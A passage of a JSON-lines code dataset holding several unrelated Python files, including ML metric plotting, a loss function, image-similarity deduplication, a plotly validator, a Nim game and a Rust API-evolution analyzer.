[hyperparam_obj['metrics']['precision'][average]]\n\n return list(accuracy_data.keys()), accuracy_data, f1_score_data, precision_data\n\n\n# Get statistics given a aggregate function, aggregating list of values in which fold following the aggregate function\ndef get_aggregated_statistics(datas, aggregate=mean):\n ret = {\n 'hyperparam_value': datas[0],\n 'accuracy': {\n 'aggregated_list': list(map(aggregate, datas[1].values()))\n },\n 'f1_score': {\n 'aggregated_list': list(map(aggregate, datas[2].values()))\n },\n 'precision': {\n 'aggregated_list': list(map(aggregate, datas[3].values()))\n },\n }\n\n # max of which metric\n ret['accuracy']['max_value'] = max(ret['accuracy']['aggregated_list'])\n ret['f1_score']['max_value'] = max(ret['f1_score']['aggregated_list'])\n ret['precision']['max_value'] = max(ret['precision']['aggregated_list'])\n\n # hyperparam_value of which max metric\n ret['accuracy']['max_hyperparam_value'] = ret['hyperparam_value'][\n ret['accuracy']['aggregated_list'].index(ret['accuracy']['max_value'])]\n ret['f1_score']['max_hyperparam_value'] = ret['hyperparam_value'][\n ret['f1_score']['aggregated_list'].index(ret['f1_score']['max_value'])]\n ret['precision']['max_hyperparam_value'] = ret['hyperparam_value'][\n ret['precision']['aggregated_list'].index(ret['precision']['max_value'])]\n\n return ret\n\n\n# Plot the graph given a statistics data, and save the graph in image file\ndef plot_graph(data_statistics, title=\"\", image_name=None, hyperparam_name=\"\"):\n df = pd.DataFrame({'x': data_statistics['hyperparam_value'],\n 'accuracy': data_statistics['accuracy']['aggregated_list'],\n 'f1_score': data_statistics['f1_score']['aggregated_list'],\n 'precision': data_statistics['precision']['aggregated_list']\n })\n\n # Plot accuracy - lines\n plt.plot('x', 'accuracy', data=df, color='red', label='Accuracy')\n plt.plot('x', 'f1_score', data=df, color='green', label='F1 Score')\n plt.plot('x', 'precision', data=df, color='blue', label='Precision')\n\n # Plot accuracy - create image\n plt.legend()\n plt.title(title)\n plt.xlabel('{hyperparam_name} value'.format(hyperparam_name=hyperparam_name))\n plt.ylabel('metric value')\n\n if image_name:\n plt.savefig('../results/graphs/{name}.png'.format(name=image_name))\n\n plt.show()\n\n\n# Open a json file, parse it\n# use functions above to generate graph and return the statistics, given a hyperparam\ndef open_and_plot_graph_for_hyperparam(hyperparam_name, hyperparam_file_name, attribute_name, aggregate=mean):\n with open('../results/json/{file_name}.json'.format(file_name=hyperparam_file_name), 'r') as myfile:\n data = myfile.read()\n\n json_el = json.loads(data)\n\n datas = get_metrics(json_el, attribute_name)\n\n # get statistics of hyperparam\n statistics_data = get_aggregated_statistics(datas, aggregate)\n\n # Plot hyperparam graph\n plot_graph(statistics_data,\n hyperparam_name=hyperparam_name,\n title='Metrics values to \"{hyperparam_name}\" hyperparam'.format(hyperparam_name=hyperparam_name),\n image_name=hyperparam_name)\n\n return statistics_data\n\n\n# --------------- PLOT AND SAVE STATISTICS OF HYPERPARAMS --------------\n\n# create a graph to number os estimators hyperparam\nn_estimators_statistics = open_and_plot_graph_for_hyperparam(\n hyperparam_name='Number of estimators',\n hyperparam_file_name='n_estimators',\n attribute_name='n_estimators',\n aggregate=min)\n\n# create a graph to min sample split hyperparam\nmin_samples_split_statistics = open_and_plot_graph_for_hyperparam(\n hyperparam_name='Min Samples Split',\n hyperparam_file_name='min_samples_split',\n attribute_name='min_samples_split',\n aggregate=min)\n\n# create a graph to min sample split hyperparam\ncriterion_statistics = open_and_plot_graph_for_hyperparam(\n hyperparam_name='Criterions',\n hyperparam_file_name='criterion',\n attribute_name='criterion',\n aggregate=min)\n\n# create a graph to min sample split hyperparam\nmax_depth_statistics = open_and_plot_graph_for_hyperparam(\n hyperparam_name='Max Depth',\n hyperparam_file_name='max_depth',\n attribute_name='max_depth',\n aggregate=min)\n\n# create a graph to min samples leaf hyperparam\nmin_samples_leaf_statistics = open_and_plot_graph_for_hyperparam(\n hyperparam_name='Min Samples Leaf',\n hyperparam_file_name='min_samples_leaf',\n attribute_name='min_samples_leaf',\n aggregate=min)\n\n# create a graph to number os estimators hyperparam\nmin_impurity_decrease_statistics = open_and_plot_graph_for_hyperparam(\n hyperparam_name='Min Impurity Decrease',\n hyperparam_file_name='min_impurity_decrease',\n attribute_name='min_impurity_decrease',\n aggregate=min)\n\n# --------------- END PLOT AND SAVE STATISTICS OF HYPERPARAMS --------------\n\nprint(\"Table of bests values\")\nprint('Number of estimators',\n round(n_estimators_statistics['accuracy']['max_value'], 3),\n n_estimators_statistics['accuracy']['max_hyperparam_value'],\n round(n_estimators_statistics['f1_score']['max_value'], 3),\n n_estimators_statistics['f1_score']['max_hyperparam_value'],\n round(n_estimators_statistics['precision']['max_value'], 3),\n n_estimators_statistics['precision']['max_hyperparam_value'],\n sep=','\n )\n\nprint('Min Samples Split',\n round(min_samples_split_statistics['accuracy']['max_value'], 3),\n min_samples_split_statistics['accuracy']['max_hyperparam_value'],\n round(min_samples_split_statistics['f1_score']['max_value'], 3),\n min_samples_split_statistics['f1_score']['max_hyperparam_value'],\n round(min_samples_split_statistics['precision']['max_value'], 3),\n min_samples_split_statistics['precision']['max_hyperparam_value'],\n sep=','\n )\n\nprint('Criterion',\n round(criterion_statistics['accuracy']['max_value'], 3),\n criterion_statistics['accuracy']['max_hyperparam_value'],\n round(criterion_statistics['f1_score']['max_value'], 3),\n criterion_statistics['f1_score']['max_hyperparam_value'],\n round(criterion_statistics['precision']['max_value'], 3),\n criterion_statistics['precision']['max_hyperparam_value'],\n sep=','\n )\n\nprint('Max Depth',\n round(max_depth_statistics['accuracy']['max_value'], 3),\n max_depth_statistics['accuracy']['max_hyperparam_value'],\n round(max_depth_statistics['f1_score']['max_value'], 3),\n max_depth_statistics['f1_score']['max_hyperparam_value'],\n round(max_depth_statistics['precision']['max_value'], 3),\n max_depth_statistics['precision']['max_hyperparam_value'],\n sep=','\n )\n\nprint('Min Samples Leaf',\n round(min_samples_leaf_statistics['accuracy']['max_value'], 3),\n min_samples_leaf_statistics['accuracy']['max_hyperparam_value'],\n round(min_samples_leaf_statistics['f1_score']['max_value'], 3),\n min_samples_leaf_statistics['f1_score']['max_hyperparam_value'],\n round(min_samples_leaf_statistics['precision']['max_value'], 3),\n min_samples_leaf_statistics['precision']['max_hyperparam_value'],\n sep=','\n )\n\nprint('Min Impurity Decrease',\n round(min_impurity_decrease_statistics['accuracy']['max_value'], 3),\n min_impurity_decrease_statistics['accuracy']['max_hyperparam_value'],\n round(min_impurity_decrease_statistics['f1_score']['max_value'], 3),\n min_impurity_decrease_statistics['f1_score']['max_hyperparam_value'],\n round(min_impurity_decrease_statistics['precision']['max_value'], 3),\n min_impurity_decrease_statistics['precision']['max_hyperparam_value'],\n sep=','\n )\n","repo_name":"Hugo-NF/FSI-2-Random_Forest","sub_path":"src/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":8974,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"31341034302","text":"# -*- coding : utf-8 -*-\n\nimport numpy as np\n\n# cross entropy loss\ndef compute_loss(A_L, Y):\n \"\"\"\n :param A_L: probability vector corresponding to your label predictions, shape (1, number of examples)\n :param Y: true \"label\" vector , shape (1, number of examples)\n :return loss:\n \"\"\"\n m = Y.shape[1]\n loss = -1. / m * np.sum(np.multiply(np.log(A_L), Y) + np.multiply(np.log(1 - A_L), 1 - Y))\n loss = np.squeeze(loss) # To make sure your cost's shape is what we expect (e.g. this turns [[10]] into 10).\n assert (loss.shape == ())\n\n return loss\n\ndef compute_loss_with_L2_regularization(A_L, Y, lambd, W1,W2,W3,W4):\n \"\"\"\n :param A_L:\n :param Y:\n :param lambd:\n :param W1:\n :param W2:\n :param W3:\n :param W4:\n :return cost: loss with L2 regularization\n \"\"\"\n cross_entropy_cost = compute_loss(A_L, Y)\n m = Y.shape[1]\n l2_regularization_cost = lambd / (2 * m) * (np.sum(np.square(W1)) + np.sum(np.square(W2)) +\n np.sum(np.square(W3)) + np.sum(np.square(W4)))\n\n cost = cross_entropy_cost + l2_regularization_cost\n\n return cost","repo_name":"shenhuipeng/Two-Nested-Spirals","sub_path":"lossFunction.py","file_name":"lossFunction.py","file_ext":"py","file_size_in_byte":1146,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"22"} +{"seq_id":"34756169944","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2022/1/20 11:33\n# @Author : Wang Zixv\n# @Site : \n# @File : Calculate image similarity.py\n# @Software: PyCharm\n# 计算图片相似度算法\nimport os\nimport sys\nimport skimage\n\nimport cv2\nfrom sklearn.metrics.pairwise import cosine_similarity\nimport numpy as np\n\n\ndef pHash(img, leng=32, wid=32):\n img = cv2.resize(img, (leng, wid))\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n dct = cv2.dct(np.float32(gray))\n dct_roi = dct[0:8, 0:8]\n avreage = np.mean(dct_roi)\n phash_01 = (dct_roi > avreage) + 0\n phash_list = phash_01.reshape(1, -1)[0].tolist()\n hash = ''.join([str(x) for x in phash_list])\n return hash\n\n\ndef dHash(img, leng=9, wid=8):\n img = cv2.resize(img, (leng, wid))\n image = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n # 每行前一个像素大于后一个像素为1,相反为0,生成哈希\n hash = []\n for i in range(wid):\n for j in range(wid):\n if image[i, j] > image[i, j + 1]:\n hash.append(1)\n else:\n hash.append(0)\n return hash\n\n\ndef aHash(img, leng=8, wid=8):\n img = cv2.resize(img, (leng, wid))\n image = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n avreage = np.mean(image)\n hash = []\n for i in range(image.shape[0]):\n for j in range(image.shape[1]):\n if image[i, j] >= avreage:\n hash.append(1)\n else:\n hash.append(0)\n return hash\n\n\ndef Hamming_distance(hash1, hash2):\n num = 0\n for index in range(len(hash1)):\n if hash1[index] != hash2[index]:\n num += 1\n return num\n\n\ndef handle_img(img):\n img = cv2.resize(img, (100, 100))\n img = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)\n img[:, :, 2] = cv2.equalizeHist(img[:, :, 2])\n img = cv2.cvtColor(img, cv2.COLOR_HSV2BGR)\n return img\n\n\ndef get_img_list(_target_folder):\n img_list = []\n for root, dirs, files in os.walk(_target_folder):\n for file in files:\n img_list.append(os.path.join(root, file))\n return img_list\n\n\n# 直方图判断相似度\ndef get_similarity2(img_new, target_img_list, threshold_sim=0.5):\n for target_img_path in target_img_list:\n target_img = cv2.imread(target_img_path)\n if img_new.shape[0] == target_img.shape[0] and img_new.shape[1] == target_img.shape[1]:\n if img_new.shape[0] > 1000 or img_new.shape[1] > 1000:\n img1 = cv2.resize(img_new, (1000, 1000))\n img2 = cv2.resize(target_img, (1000, 1000))\n match2 = cv2.compareHist(img1, img2, cv2.HISTCMP_CORREL)\n # result_sim = cosine_similarity(img1, img2, dense_output=False)\n # result_sim_avg = np.mean(result_sim)\n print(match2)\n if match2 > threshold_sim:\n return True\n return False\n\n\n# 图像哈希值判断相似度\ndef get_similarity3(img_new, target_img_list, threshold_sim=0.98):\n match2 = threshold_sim * 3\n # print(len(target_img_list))\n for target_img_path in target_img_list:\n # print(target_img_path)\n target_img = cv2.imread(target_img_path)\n d_dist = Hamming_distance(dHash(img_new), dHash(target_img))\n\n p_dist = Hamming_distance(pHash(img_new), pHash(target_img))\n\n a_dist = Hamming_distance(aHash(img_new), aHash(target_img))\n d = (1 - d_dist * 1.0 / 64)\n p = (1 - p_dist * 1.0 / 64)\n a = (1 - a_dist * 1.0 / 64)\n mean = d+p+a\n # print(mean)\n if mean == match2:\n return True\n return False\n\n\ndef get_similarity(img_new, target_img_list, threshold_sim=0.95):\n \"\"\"\n 余弦\n \"\"\"\n img_new_gray = cv2.cvtColor(img_new, cv2.COLOR_BGR2GRAY)\n for target_img_path in target_img_list:\n target_img = cv2.imread(target_img_path)\n target_img_gray = cv2.cvtColor(target_img, cv2.COLOR_BGR2GRAY)\n # print(target_img_path)\n if img_new_gray.shape[0] == target_img_gray.shape[0] and img_new_gray.shape[1] == target_img_gray.shape[1]:\n # result_sim = compare_ssim(img_new, target_img, multichannel=True) # BUG\n if img_new_gray.shape[0] > 1000 or img_new_gray.shape[1] > 1000:\n img1 = cv2.resize(img_new_gray, (100, 100))\n img2 = cv2.resize(target_img_gray, (100, 100))\n # result_sim = cosine_similarity(img_new_gray, target_img_gray, dense_output=False)\n result_sim = cosine_similarity(img1, img2, dense_output=False)\n result_sim_avg = np.mean(result_sim)\n print(result_sim_avg)\n if result_sim_avg > threshold_sim:\n return True\n\n return False\n\n\ndef move_img(root_path, img_name, img):\n move_path = os.path.join(root_path, img_name)\n cv2.imwrite(move_path, img)\n\n\nif __name__ == '__main__':\n if len(sys.argv) < 2:\n # print(\"该算法\")\n print(\"参数过少,请按照格式进行输入:0.python程序名称 1.准备移动的文件夹 2.目标文件夹\")\n # todo break\n # move_folder = sys.argv[1]\n # target_folder = sys.argv[2]\n move_folder = \"E:\\\\progectlocation\\\\python_program\\\\wallpaper\\\\Wallhaven\"\n target_folder = \"E:\\\\DesktopBackGround2\"\n # move_folder = \"./test1\"\n # target_folder = \"./test2\"\n # 获取所有图片路径\n target_list = get_img_list(target_folder)\n move_list = get_img_list(move_folder)\n # 判断相似度\n i = 0\n\n for img_path in move_list:\n img_move = cv2.imread(img_path)\n result_bool = get_similarity3(img_move, target_list)\n if not result_bool:\n # 保存图片\n # img_name = str(img_path.split(\"\\\\\")[-1:])\n img_name = str(len(os.listdir(target_folder))) + \".jpg\"\n move_img(target_folder, img_name, img_move)\n print(\"移动了\" + str(i) + \" 张图片\")\n i += 1\n","repo_name":"PepperTree-wang/python_tools","sub_path":"Calculate image similarity/Calculate image similarity.py","file_name":"Calculate image similarity.py","file_ext":"py","file_size_in_byte":5883,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"8374516718","text":"import _plotly_utils.basevalidators\n\n\nclass DecreasingValidator(_plotly_utils.basevalidators.CompoundValidator):\n def __init__(\n self, plotly_name=\"decreasing\", parent_name=\"indicator.delta\", **kwargs\n ):\n super(DecreasingValidator, self).__init__(\n plotly_name=plotly_name,\n parent_name=parent_name,\n data_class_str=kwargs.pop(\"data_class_str\", \"Decreasing\"),\n data_docs=kwargs.pop(\n \"data_docs\",\n \"\"\"\n color\n Sets the color for increasing value.\n symbol\n Sets the symbol to display for increasing value\n\"\"\",\n ),\n **kwargs,\n )\n","repo_name":"plotly/plotly.py","sub_path":"packages/python/plotly/plotly/validators/indicator/delta/_decreasing.py","file_name":"_decreasing.py","file_ext":"py","file_size_in_byte":703,"program_lang":"python","lang":"en","doc_type":"code","stars":14438,"dataset":"github-code","pt":"3"} +{"seq_id":"21190214715","text":"def computador_escolhe_jogada (n, m):\n\tcomputadorJoga = 1\n\twhile computadorJoga != m: \n\t\tif ((n - computadorJoga) % (m + 1) == 0):\n\t\t\treturn computadorJoga\n\t\telse:\n\t\t\tcomputadorJoga += 1\n\treturn computadorJoga\n\ndef usuario_escolhe_jogada(n, m):\n\tjogadaValida = False\n\twhile not jogadaValida:\n\t\tjoga = int(input(\"Informe a jogada: \"))\n\t\tif joga > m or joga < 1:\n\t\t\tprint (\"Jogada inválida! Tente novamente\")\n\t\telse:\n\t\t\tjogadaValida = True \n\treturn joga\n\ndef partida():\n\tn = int(input(\"Quantas peças? \"))\n\tm = int(input(\"Número máximo de peças por jogada: \"))\n\tvezDoComputador = False\n\tif (n % (m + 1) == 0):\n\t\tprint (\"Você começa!\")\n\telse: \n\t\tprint (\"Computador começa\")\n\t\tvezDoComputador = True\n\twhile n > 0:\n\t\tif vezDoComputador:\n\t\t\tcomputadorJoga = computador_escolhe_jogada (n, m)\n\t\t\tn = n - computadorJoga\n\t\t\tif n == 0:\n\t\t\t\tprint (\"Fim de jogo! O computador ganhou!\")\n\t\t\telse:\n\t\t\t\tprint (\"O computador tirou\", computadorJoga, \"peça(s).\")\n\t\t\t\tprint(\"Restam\", n, \"peça(s).\")\n\t\t\tvezDoComputador = False\n\t\telse:\n\t\t\tif vezDoComputador == False:\n\t\t\t\tjogada = usuario_escolhe_jogada (n, m)\n\t\t\t\tn = n - jogada\n\t\t\t\tif n == 0:\n\t\t\t\t\tprint (\"Você venceu!\")\n\t\t\t\telse:\n\t\t\t\t\tprint(\"Você tirou\", jogada, \"peça(s).\")\n\t\t\t\t\tprint(\"Restam\", n, \"peça(s).\")\n\t\t\t\tvezDoComputador = True\n\ndef campeonato():\n\trodada = 1 \n\tpontos_usuario = 0\n\tpontos_computador = 0\n\twhile rodada <= 3: \n\t\tprint (\"**** Rodada\", rodada)\n\t\trodada += 1\n\t\tvencedor = partida()\n\t\tif vencedor == 1: \n\t\t\tpontos_usuario += 1\n\t\telse: \n\t\t\tpontos_computador += 1\n\tprint(\"Final do campeonato!\")\n\tprint(\"Placar: Usuário\", pontos_usuario, \"x\", pontos_computador, \"Computador\")\n\ninicio = print (\"Bem-vindo ao Jogo Nim! \")\nopcao1 =print (\"1 - Jogar partida\")\nopcao2 = print (\"2 - Jogar campeonato\")\n\nEscolha = int(input(\"Digite o número de uma das opções: \"))\n\nif Escolha == 1:\n\tprint(\"Você escolheu partida.\") \n\tpartida()\nelse:\n\tif Escolha == 2:\n\t\tprint(\"Você escolheu campeonato.\") \n\t\tcampeonato()","repo_name":"AgnesMinamihra/AgHM","sub_path":"jogo_nim.py","file_name":"jogo_nim.py","file_ext":"py","file_size_in_byte":1962,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"73142314322","text":"import json\nimport re\nimport os\nimport sys\nfrom glob import glob\n\n\n\ndef test_serial():\n # serialize Python object and write to JSON file\n # python_obj = {'name': 'John', 'age': 30}\n # with open('data.json', 'w') as file:\n # json.dump(python_obj, file)\n with open('test_serial.json', 'r') as file:\n python_obj = json.load(file)\n print(python_obj['api']) \n\n\ndef get_pure_string(string: str) -> str:\n '''\n Remove all special characters from a string.\n '''\n string = string.replace('⎘', u'')\n string = string.replace(u'\\xa0', u' ')\n string = string.replace(u'=', u' = ')\n string = string.replace(u'= =', u'==')\n string = re.sub(' +',' ',string)\n if string[-2:] == ', ':\n string = string[0:-2]\n return string\n\n\n\ndef empty_stability():\n return {\n 'ruf': '',\n 'status': '',\n 'since': '',\n 'full': '',\n }\n\ndef empty_api():\n return {\n 'submodule': '',\n 'head': '',\n 'impl': '',\n 'api': '',\n 'stability': list(),\n 'next_abi_index': -1, # Index of the same abi in next doc version in the same submodule. \n }\n\n\n# Transfer original raw string into well formatted one.\ndef analyze_stability(stability: list) -> list:\n stability_list = list()\n for item in stability:\n item = get_pure_string(item)\n # print(item)\n # Unstable\n for matched_unstable in re.findall('🔬 This is a nightly-only experimental API\\.\\s+\\(\\w+\\s#[0-9]+\\)', item):\n # print('Unstable 1')\n unstable_part = re.search('\\(\\w+\\s', matched_unstable)[0]\n ruf = unstable_part[1:-1]\n new_stability = empty_stability()\n new_stability['ruf'] = ruf\n new_stability['status'] = 'unstable'\n stability_list.append(new_stability)\n # Unstable 2\n for matched_unstable in re.findall('🔬 This is a nightly-only experimental API\\.\\s\\(\\w+\\)', item):\n # print('Unstable 2')\n unstable_part = re.search('\\(\\w+\\)', matched_unstable)[0]\n ruf = unstable_part.split(' ')[0][1:-1]\n new_stability = empty_stability()\n new_stability['ruf'] = ruf\n new_stability['status'] = 'unstable'\n stability_list.append(new_stability)\n # Unstable 3: Unstable (wait_timeout_with #27748): unsure if this API is broadly needed or what form it should take\\n\n for matched_unstable in re.findall('Unstable \\(\\w+ #[0-9]+\\)', item):\n # print('Unstable 3')\n unstable_part = re.search('\\(\\w+ #[0-9]+\\)', matched_unstable)[0]\n ruf = unstable_part.split(' ')[0][1:-1]\n new_stability = empty_stability()\n new_stability['ruf'] = ruf\n new_stability['status'] = 'unstable'\n new_stability['full'] = matched_unstable\n stability_list.append(new_stability)\n # Unstable 4: Unstable (libc): use libc from crates.io\\n\n for matched_unstable in re.findall('Unstable \\(\\w+\\)', item):\n # print('Unstable 4')\n unstable_part = re.search('\\(\\w+\\)', matched_unstable)[0]\n ruf = unstable_part.split(' ')[0][1:-1]\n new_stability = empty_stability()\n new_stability['ruf'] = ruf\n new_stability['status'] = 'unstable'\n new_stability['full'] = matched_unstable\n stability_list.append(new_stability)\n # Deprecated\n for matched_unstable in re.findall('Deprecated since 1.[0-9]+.[0-9]+: .+\\n', item):\n since = re.search('1.[0-9]+.[0-9]+', matched_unstable)[0]\n new_stability = empty_stability()\n new_stability['status'] = 'deprecated'\n new_stability['since'] = since\n new_stability['full'] = matched_unstable\n stability_list.append(new_stability)\n if len(stability_list) != len(stability):\n if len(stability) != 1 or 'This is supported on' not in stability[0] == '':\n print('Unhandled Stability', stability)\n for stability_item in stability_list:\n if stability_item['status'] == 'unstable' and stability_item['ruf'] == '':\n print('Unhandled Stability', stability)\n break\n # if len(stability_list) != 0:\n # print(stability_list)\n return stability_list\n\n\n# Returns (sumodule_path, api_list)\ndef recover_info(submodule) -> (str, list):\n \"\"\"\n Recover the information of a submodule from analysis results.\n Return a list containing minimal APIs.\n We do extra operations to eliminate the redundancy of the results.\n 1. Sometimes it includes `\\u24d8` which is followed by notable-trait info, useless in our study.\n 2. Stability includes portability, deprecate, unstable items. We only latter two.\n \"\"\"\n api_list = list()\n submodule_path = get_pure_string(submodule['path'])\n stability = submodule['stability']\n submodule_api = empty_api()\n submodule_api['submodule'] = submodule_path\n submodule_api['api'] = get_pure_string(submodule['api'])\n submodule_api['stability'] = analyze_stability(stability)\n # TODO: Now, we don't add submodule into the list.\n # api_list.append(submodule_api)\n for item in submodule['items']:\n head = item['head']\n for impl in item['impls']:\n impl_name = impl['impl']\n for function in impl['functions']:\n api = function['api']\n # if 'impl' in api:\n # print('Warning: impl in api', api)\n api = api.split('\\u24d8')[0]\n stability = function['stability']\n api_info = empty_api()\n api_info['submodule'] = submodule_path\n api_info['head'] = head\n api_info['impl'] = get_pure_string(impl_name)\n api_info['api'] = get_pure_string(api)\n api_info['stability'] = analyze_stability(stability)\n api_list.append(api_info)\n return (submodule_path, api_list)\n \n\n\ndef is_api_same(api1: dict, api2: dict) -> bool:\n return api1['impl'] == api2['impl'] and api1['api'] == api2['api']\n\n\n\ndef is_same_api(api1: dict, api2: dict) -> bool:\n '''\n Compare two APIs to see if they are the same, but different parameters are tolerated.\n '''\n if api1['impl'] != api2['impl']:\n return False\n if api1['api'] == api2['api']:\n return True\n function_name1 = re.search('fn \\w+[<|(]', api1['api'])\n function_name2 = re.search('fn \\w+[<|(]', api2['api'])\n if function_name1 and function_name2:\n if function_name1[0][3:-1] == function_name2[0][3:-1]:\n # print('API Changed', api1['submodule'])\n # print(api1)\n # print(api2)\n return True\n # if not function_name1 and api1['api'][0:6] == api2['api'][0:6]:\n # print('Similar', api1['submodule'])\n # print(api1['api'])\n # print(api2['api'])\n return False\n\n\ndef print_removed_api_info(api_list: list, new_api_list: list):\n '''\n Print removed API info.\n '''\n index_set = set()\n for api in api_list:\n next_abi_index = api['next_abi_index']\n if next_abi_index == -1:\n print('Removed API:', api)\n else:\n index_set.add(next_abi_index)\n for idx, api in enumerate(new_api_list):\n if idx not in index_set:\n print('New API:', api)\n\n\n\ndef print_new_module_info(doc:dict, doc_new:dict):\n '''\n Print new module info.\n '''\n for (submodule_path, api_list) in doc_new.items():\n if submodule_path not in doc:\n print('New Module:', submodule_path, len(api_list))\n print(*api_list, sep='\\n')\n print('------------------')\n\n\ndef count_truenew_api(doc:dict, doc_new:dict):\n '''\n Count the number of new API in doc_new, which are not in doc.\n We remove `Implementors` as they are passively implemented, determined by traits.\n Sometimes it cannot reflect true api changes.\n '''\n count = 0\n for (submodule_path, api_list) in doc.items():\n if submodule_path not in doc_new:\n continue\n index_set = set()\n new_api_list = doc_new[submodule_path]\n for api in api_list:\n next_abi_index = api['next_abi_index']\n index_set.add(next_abi_index)\n for idx, api in enumerate(new_api_list):\n if idx not in index_set and api['head'] not in ['Implementors', 'Blanket Implementations']:\n count += 1\n for (submodule_path, api_list) in doc_new.items():\n if submodule_path not in doc:\n count += len(api_list)\n return count\n\n\n\ndef construct_api_binding(docs:list, MIN_VERSION, MAX_VERSION):\n '''\n Connect the API evolution in different versions.\n '''\n remained_api_count = 0\n for i in range(MIN_VERSION, MAX_VERSION):\n index = i - MIN_VERSION\n api_count = 0\n same_count = 0\n modify_count = 0\n removed_count = 0\n trueremoved_count = 0\n truemodify_count = 0\n for (submodule_path, api_list) in docs[index].items():\n api_count += len(api_list)\n # Removed submodule\n if submodule_path not in docs[index+1]:\n # print('Removed Submodule:', submodule_path, len(api_list))\n removed_count += len(api_list)\n continue\n new_api_list = docs[index+1][submodule_path]\n for api in api_list:\n for idx, new_api in enumerate(new_api_list):\n if is_same_api(api, new_api):\n if api['next_abi_index'] != -1:\n # print('Error: next_abi_index already set', api['submodule'], api['api'])\n break\n api['next_abi_index'] = idx\n # analyze_api_evolution\n for api in api_list:\n if api['next_abi_index'] == -1:\n removed_count += 1\n if api['head'] not in ['Implementors', 'Blanket Implementations']:\n trueremoved_count += 1\n else:\n next_api = docs[index+1][submodule_path][api['next_abi_index']]\n if is_api_same(api, next_api):\n same_count += 1\n else:\n modify_count += 1\n if not ('pub fn ' not in api['api'] and 'pub fn ' in next_api['api']) \\\n and not ('pub fn ' in api['api'] and 'pub fn ' not in next_api['api']):\n # print('API Changed')\n # print('Old:', api)\n # print('New:', next_api)\n truemodify_count += 1\n print_removed_api_info(api_list, new_api_list)\n # print_new_module_info(docs[index], docs[index+1])\n if index > 0:\n new_api_count = api_count - remained_api_count\n truenew_api = count_truenew_api(docs[index-1], docs[index])\n else:\n new_api_count = -1\n truenew_api = -1\n remained_api_count = same_count + modify_count\n print('Version', '{:>2}'.format(i), 'API Count', api_count,\n 'Same', '{:>5}'.format(same_count),\n 'Modify', '{:>5}'.format(modify_count), \n 'Removed', '{:>5}'.format(removed_count), \n 'New', '{:>5}'.format(new_api_count), \n 'True Modify', '{:>5}'.format(truemodify_count), \n 'True Removed', '{:>5}'.format(trueremoved_count), \n 'True New', '{:>5}'.format(truenew_api))\n # # Print Changed API\n # print('Submodule:', submodule_path)\n # for api in api_list:\n # if api['next_abi_index'] == -1:\n # print(api)\n\n # # Print All API\n # print('Submodule:', submodule_path)\n # print('--------Old------')\n # print(*api_list, sep='\\n')\n # print('--------New------')\n # print(*new_api_list, sep='\\n')\n # print('------------------')\n\n\ndef analyze_api_evolution(docs:list, MIN_VERSION, MAX_VERSION):\n '''\n Analyze the API evolution in different ways, aspects. (API change, Stability change, etc)\n 1. Quick check same: Complete same.\n 2. Detailed check same: API unchanged. Other changes are acceptable.\n 3. Modified: API name same, but signature changed.\n 4. Removed: API removed.\n We then compare the API evolution with the stability evolution to see if they really match.\n Some API are duplicated, but with limited impact. \n Some are OK as ducumentation record is duplicated sometimes (rarely found).\n Some are caused by duplicated info extraction (rarely found).\n \n '''\n print('Start Analyzing API Evolution ...')\n construct_api_binding(docs, MIN_VERSION, MAX_VERSION)\n # for i in range(MIN_VERSION, MAX_VERSION):\n # index = i - MIN_VERSION\n # api_count = 0\n # same_count = 0\n # modify_count = 0\n # removed_count = 0\n # for (submodule_path, api_list) in docs[index].items():\n # api_count += len(api_list)\n # for api in api_list:\n # if api['next_abi_index'] == -1:\n # removed_count += 1\n # else:\n # next_api = docs[index+1][submodule_path][api['next_abi_index']]\n # if is_api_same(api, next_api):\n # same_count += 1\n # else:\n # modify_count += 1\n # print('Version', i, 'API Count', api_count, 'Same', same_count, 'Modify', modify_count, 'Removed', removed_count)\n\n\n\n\ndef analyze_all_docs(MIN_VERSION = 1, MAX_VERSION = 63):\n '''\n Parse all rustdocs to get items data in different compiler versions.\n These data are actually Abstract Resource Tree. Through analysing AST, we can know API evolution, especially unstable API.\n @Algorithm:\n 1. We first parse root doc and call `get_crates()` to get all standard library crates, which we will then parse them.\n 2. We call `parse_html()` to parse all html files, which contain AST of all data (e.g. modules, primitives, functions, structs).\n\n '''\n print('Start Analyzing Rust Docs ...')\n docs = list() # Each version of docs\n for i in range(MIN_VERSION, MAX_VERSION+1):\n version_num = '1.' + str(i) + '.0'\n print('Parsing Rust Docs', version_num)\n # Find root html: std/index.html\n current_directory = os.getcwd() + '/'\n doc_directory = current_directory + version_num + '/rust-docs-nightly-x86_64-unknown-linux-gnu/json_submodule'\n submodule_map = {} # Map submodule path to submodule\n for file_name in glob(doc_directory + '/**/*.html.json', recursive=True):\n with open(file_name, 'r') as file:\n submodule_original = json.load(file)\n (submodule_path, submodule_plain) = recover_info(submodule_original)\n submodule_map[submodule_path] = submodule_plain\n docs.append(submodule_map)\n analyze_api_evolution(docs, MIN_VERSION, MAX_VERSION)\n # for doc in docs:\n # for (submodule_path, api_list) in doc.items():\n # print('Submodule:', submodule_path)\n # print(*api_list, sep='\\n')\n # print('------------------')\n\n\n\n\n\n#TODO: Anylize the API evolution in different ways, aspects. (API change, Stability change, etc)\nif sys.argv[1] == 'complete':\n analyze_all_docs()\nif sys.argv[1] == 'complete_selected':\n analyze_all_docs(int(sys.argv[2]), int(sys.argv[3]))\n# with open('test_serial.json', 'r') as file:\n# submodule = json.load(file)\n# print(*recover_info(submodule)[1], sep='\\n')\n\n'''\nFindings:\n 1. 1.4.0 -> 1.5.0 `libc` crates changed a lot, refactoring many submodules, causing lots of removals and new submodules.\n 2. 1.16.0 -> 1.17.0 Some type in the trait has been changed, causing large-scale implementation changes.\n 3. 1.18.0 -> 1.19.0 Trait `Iterator` changed provided functions, all implementations are affected.\n 4. 1.24.0 -> 1.26.0 Arch-related API are introduced, like `core::arch` and `std::simd`.\n 5. 1.27.0 -> 1.28.0 Arch-related API are removed, like `core::arch` 